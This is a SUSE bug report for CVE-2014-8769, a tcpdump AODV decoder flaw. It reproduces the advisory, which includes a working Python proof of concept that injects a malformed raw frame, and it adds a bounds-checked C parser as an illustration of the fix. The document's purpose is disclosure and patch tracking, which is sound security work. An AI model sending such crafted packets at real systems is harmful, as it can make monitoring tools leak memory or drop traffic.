Bug 905872 (CVE-2014-8769) - VUL-1: CVE-2014-8769: tcpdump: unreliable output using malformed AOVD payload
Summary: VUL-1: CVE-2014-8769: tcpdump: unreliable output using malformed AOVD payload
Status: RESOLVED FIXED
Alias: CVE-2014-8769
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Version: unspecified
Hardware: Other Other
Priority: P3 - Medium
Severity: Minor
Target Milestone: ---
Deadline: 2014-12-16
Assignee: Security Team bot
QA Contact: Security Team bot
URL:
Whiteboard: maint:released:sle11-sp1:59704 maint:...
Keywords:
Depends on:
Blocks:
 
Reported: 2014-11-18 08:37 UTC by Johannes Segitz
Modified: 2017-05-08 16:13 UTC
CC List: 2 users

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Description Johannes Segitz 2014-11-18 08:37:27 UTC
CVE-2014-8769 tcpdump unreliable output using malformed AOVD payload

1. Background

tcpdump is a powerful command-line packet analyzer. It allows the user
to intercept and display TCP/IP and other packets being transmitted or
received over a network to which the computer is attached.

2. Summary Information

It was found that malformed network traffic (AODV-based) can lead to
abnormal behaviour if the verbose output of tcpdump monitoring the
network is used.

3. Technical Description

The application decoder for the Ad hoc On-Demand Distance Vector
(AODV) protocol fails to perform input validation and performs unsafe
out-of-bounds accesses. The application will usually not crash, but
perform out-of-bounds accesses and output/leak larger amounts of
invalid data, which might lead to dropped packets. It is unknown if
other payload exists that might trigger segfaults.

To reproduce, start tcpdump on a network interface:

sudo tcpdump -i lo -s 0 -n -v

(running the program with sudo might hide a possible segfault message
in certain environments; see dmesg for details)

and use the following Python program to generate a frame on the
network (might also need sudo):

#!/usr/bin/env python
# Sends one raw Ethernet frame on the loopback interface (needs CAP_NET_RAW,
# i.e. sudo). The bytes literal works under both Python 2 and Python 3.
from socket import socket, AF_PACKET, SOCK_RAW

s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))

aovd_frame = (
    # Ethernet: dst 00:00:00:00:00:00, src 00:00:8c:7a:df:6f, type 0x0800 (IPv4)
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00"
    # IPv4 header: declared total length 0xe63d far exceeds the frame, proto 17 (UDP)
    b"\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02"
    # UDP header: src port 654 (AODV), dst port 3328, declared length 0x4b00
    b"\x02\x8e\x0d\x00\x4b\x00\x00\xe8"
    # payload handed to the AODV decoder, much shorter than the declared lengths
    b"\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f"
    b"\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"
)

s.send(aovd_frame)

4. Affected versions

Affected versions are 3.8 through 4.6.2.

5. Fix

The problem is fixed in the upcoming version tcpdump 4.7.0.

6. Advisory Timeline

2014-11-08 Discovered
2014-11-09 Requested CVE
2014-11-11 Reported to vendor by email
2014-11-12 Vendor made a fix available as repository patch
2014-11-13 CVE number received
2014-11-13 Published CVE advisory

7. Credit

The issue was found by

Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de

using a slightly enhanced version of american fuzzy lop
(https://code.google.com/p/american-fuzzy-lop/) created by Michal
Zalewski.

SLES 10, 11, 12 and all openSUSE are affected
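The defect class described in section 3 of the advisory is a packet decoder that reads fields without first checking that they lie inside the captured buffer. The following is an added example, not tcpdump's print-aodv.c and not the upstream fix: a small bounds-checked decoder for an AODV Route Request (the 24-byte RREQ layout of RFC 3561, followed by type/length/value extensions as RFC 3561 defines them). The struct, function names, status codes and the two sample packets are constructed for this illustration. Every field access is guarded by a check against the remaining length, and an extension whose length byte promises more bytes than the packet actually carries is reported as malformed instead of being read past the end of the buffer, which is the behaviour the advisory reports for the unpatched decoder.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* RFC 3561 message type for a Route Request and the size of its fixed header. */
#define AODV_RREQ      1
#define AODV_RREQ_LEN  24

enum aodv_status {
    AODV_OK        =  0,
    AODV_TRUNCATED = -1,  /* buffer ends before the fixed header does */
    AODV_BAD_TYPE  = -2,  /* not an RREQ */
    AODV_BAD_EXT   = -3   /* an extension's declared length runs past the buffer */
};

struct aodv_rreq {
    uint8_t  hopcount;
    uint32_t rreq_id, dst, dst_seq, orig, orig_seq;
    size_t   n_ext;       /* well-formed extensions found after the header */
};

static uint32_t get32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Decodes an RREQ from a captured buffer of `len` bytes. Every access is
 * preceded by a check against `len`, so a short packet, or one whose
 * length fields lie, yields an error code instead of an out-of-bounds read. */
int aodv_parse_rreq(const uint8_t *buf, size_t len, struct aodv_rreq *out)
{
    memset(out, 0, sizeof *out);
    if (len < 1)
        return AODV_TRUNCATED;
    if (buf[0] != AODV_RREQ)
        return AODV_BAD_TYPE;
    if (len < AODV_RREQ_LEN)
        return AODV_TRUNCATED;

    out->hopcount = buf[3];
    out->rreq_id  = get32(buf + 4);
    out->dst      = get32(buf + 8);
    out->dst_seq  = get32(buf + 12);
    out->orig     = get32(buf + 16);
    out->orig_seq = get32(buf + 20);

    /* Extensions: one byte of type, one byte of length, then `length` bytes
     * of value. The length byte comes from the wire, so it is compared with
     * the bytes that actually remain before the value is skipped over. */
    for (size_t off = AODV_RREQ_LEN; off < len; ) {
        if (len - off < 2)
            return AODV_BAD_EXT;          /* extension header itself is cut off */
        size_t ext_len = buf[off + 1];
        if (ext_len > len - off - 2)
            return AODV_BAD_EXT;          /* value would extend past the buffer */
        off += 2 + ext_len;
        out->n_ext++;
    }
    return AODV_OK;
}

/* Convenience wrappers that reduce one parse to a single return value. */
int parse_status(const uint8_t *buf, size_t len)
{
    struct aodv_rreq r;
    return aodv_parse_rreq(buf, len, &r);
}

int parse_ext_count(const uint8_t *buf, size_t len)
{
    struct aodv_rreq r;
    return aodv_parse_rreq(buf, len, &r) == AODV_OK ? (int)r.n_ext : -1;
}

/* Constructed sample (not from a real capture): a well-formed RREQ with
 * hop count 2 and RREQ ID 0x1234, followed by one extension of type 1
 * whose length byte (4) matches the bytes that follow it. */
static const uint8_t sample_ok[] = {
    0x01, 0x00, 0x00, 0x02,  0x00, 0x00, 0x12, 0x34,
    0x0a, 0x02, 0x02, 0x02,  0x00, 0x00, 0x00, 0x07,
    0x0a, 0x01, 0x01, 0x68,  0x00, 0x00, 0x00, 0x09,
    0x01, 0x04, 0x00, 0x00,  0x03, 0xe8
};

/* Same header, but the extension claims 200 bytes of value and only 4 follow. */
static const uint8_t sample_bad_ext[] = {
    0x01, 0x00, 0x00, 0x02,  0x00, 0x00, 0x12, 0x34,
    0x0a, 0x02, 0x02, 0x02,  0x00, 0x00, 0x00, 0x07,
    0x0a, 0x01, 0x01, 0x68,  0x00, 0x00, 0x00, 0x09,
    0x01, 0xc8, 0x00, 0x00,  0x03, 0xe8
};

int main(void)
{
    printf("well-formed RREQ:        status %d, %d extension(s)\n",
           parse_status(sample_ok, sizeof sample_ok),
           parse_ext_count(sample_ok, sizeof sample_ok));
    printf("header cut at 20 bytes:  status %d\n", parse_status(sample_ok, 20));
    printf("oversized extension:     status %d\n",
           parse_status(sample_bad_ext, sizeof sample_bad_ext));
    return 0;
}
```

The design point is that the decision about a malformed packet is carried by the return code, never by how far the printer happened to get: a capture tool built on this pattern can print "[|aodv]" or "truncated" and move to the next packet, rather than emitting bytes that lie beyond the frame it received. The truncated lengths in the advisory's reproducer (a declared IP total length and UDP length far larger than the 75 bytes on the wire) are exactly the inputs the `len - off` checks exist for.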
Comment 1 Swamp Workflow Management 2014-11-18 10:32:44 UTC
An update workflow for this issue was started.
This issue was rated as low.
Please submit fixed packages until 2014-12-16.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/59702
Comment 2 Swamp Workflow Management 2014-11-18 23:00:32 UTC
bugbot adjusting priority
Comment 5 Swamp Workflow Management 2014-12-23 18:06:15 UTC
SUSE-SU-2014:1692-1: An update that fixes two vulnerabilities is now available.

Category: security (low)
Bug References: 905870,905872
CVE References: CVE-2014-8767,CVE-2014-8769
Sources used:
SUSE Linux Enterprise Server 11 SP3 for VMware (src):    tcpdump-3.9.8-1.23.1
SUSE Linux Enterprise Server 11 SP3 (src):    tcpdump-3.9.8-1.23.1
SUSE Linux Enterprise Desktop 11 SP3 (src):    tcpdump-3.9.8-1.23.1
Comment 6 Swamp Workflow Management 2014-12-29 10:05:24 UTC
SUSE-SU-2014:1723-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 905870,905871,905872
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769
Sources used:
SUSE Linux Enterprise Server 12 (src):    tcpdump-4.5.1-4.1
SUSE Linux Enterprise Desktop 12 (src):    tcpdump-4.5.1-4.1
Comment 8 Bernhard Wiedemann 2015-02-06 13:00:14 UTC
This is an autogenerated message for OBS integration:
This bug (905872) was mentioned in
https://build.opensuse.org/request/show/284471 13.2+13.1 / tcpdump
Comment 9 Swamp Workflow Management 2015-02-13 15:05:14 UTC
openSUSE-SU-2015:0284-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 905870,905871,905872
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769
Sources used:
openSUSE 13.2 (src):    tcpdump-4.6.2-4.1
openSUSE 13.1 (src):    tcpdump-4.4.0-2.4.1
Comment 10 Victor Pereira 2015-02-13 20:35:35 UTC
released
Comment 11 Swamp Workflow Management 2017-04-26 19:09:36 UTC
SUSE-SU-2017:1110-1: An update that fixes 49 vulnerabilities is now available.

Category: security (moderate)
Bug References: 1020940,1035686,905870,905871,905872,922220,922221,922222,922223,927637
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769,CVE-2015-0261,CVE-2015-2153,CVE-2015-2154,CVE-2015-2155,CVE-2015-3138,CVE-2016-7922,CVE-2016-7923,CVE-2016-7924,CVE-2016-7925,CVE-2016-7926,CVE-2016-7927,CVE-2016-7928,CVE-2016-7929,CVE-2016-7930,CVE-2016-7931,CVE-2016-7932,CVE-2016-7933,CVE-2016-7934,CVE-2016-7935,CVE-2016-7936,CVE-2016-7937,CVE-2016-7938,CVE-2016-7939,CVE-2016-7940,CVE-2016-7973,CVE-2016-7974,CVE-2016-7975,CVE-2016-7983,CVE-2016-7984,CVE-2016-7985,CVE-2016-7986,CVE-2016-7992,CVE-2016-7993,CVE-2016-8574,CVE-2016-8575,CVE-2017-5202,CVE-2017-5203,CVE-2017-5204,CVE-2017-5205,CVE-2017-5341,CVE-2017-5342,CVE-2017-5482,CVE-2017-5483,CVE-2017-5484,CVE-2017-5485,CVE-2017-5486
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP2 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Workstation Extension 12-SP1 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Software Development Kit 12-SP2 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Server 12-SP2 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Server 12-SP1 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Desktop 12-SP2 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Desktop 12-SP1 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
Comment 12 Swamp Workflow Management 2017-05-08 16:13:08 UTC
openSUSE-SU-2017:1199-1: An update that fixes 49 vulnerabilities is now available.

Category: security (moderate)
Bug References: 1020940,1035686,905870,905871,905872,922220,922221,922222,922223,927637
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769,CVE-2015-0261,CVE-2015-2153,CVE-2015-2154,CVE-2015-2155,CVE-2015-3138,CVE-2016-7922,CVE-2016-7923,CVE-2016-7924,CVE-2016-7925,CVE-2016-7926,CVE-2016-7927,CVE-2016-7928,CVE-2016-7929,CVE-2016-7930,CVE-2016-7931,CVE-2016-7932,CVE-2016-7933,CVE-2016-7934,CVE-2016-7935,CVE-2016-7936,CVE-2016-7937,CVE-2016-7938,CVE-2016-7939,CVE-2016-7940,CVE-2016-7973,CVE-2016-7974,CVE-2016-7975,CVE-2016-7983,CVE-2016-7984,CVE-2016-7985,CVE-2016-7986,CVE-2016-7992,CVE-2016-7993,CVE-2016-8574,CVE-2016-8575,CVE-2017-5202,CVE-2017-5203,CVE-2017-5204,CVE-2017-5205,CVE-2017-5341,CVE-2017-5342,CVE-2017-5482,CVE-2017-5483,CVE-2017-5484,CVE-2017-5485,CVE-2017-5486
Sources used:
openSUSE Leap 42.2 (src):    libpcap-1.8.1-7.3.1, tcpdump-4.9.0-6.3.1
openSUSE Leap 42.1 (src):    libpcap-1.8.1-8.1, tcpdump-4.9.0-7.1